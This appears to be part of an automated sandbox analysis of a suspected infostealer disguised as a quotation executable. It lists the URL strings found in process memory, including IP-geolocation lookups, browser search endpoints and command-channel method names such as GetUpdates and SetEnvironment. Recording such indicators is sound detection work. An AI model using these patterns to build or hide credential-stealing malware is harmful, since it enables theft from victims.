Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: vbc.exe, 00000004.00000002.378025847.0000000005687000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348363338.00000000056A5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.474849036.00000000056D5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.483489857.00000000056D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://forms.rea
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.ado/1
Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.ado/1_
Source: vbc.exe, 00000004.00000003.377169989.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377236233.000000000D2C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377186734.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.366510707.000000000D2B1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g_
Source: vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cobj_
Source: vbc.exe, 00000004.00000002.379532591.00000000074CE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.r
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.a
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484560508.000000000734A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr, tmpE68F.tmp.23.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab1
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.adob
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://helpx.ad
Source: vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
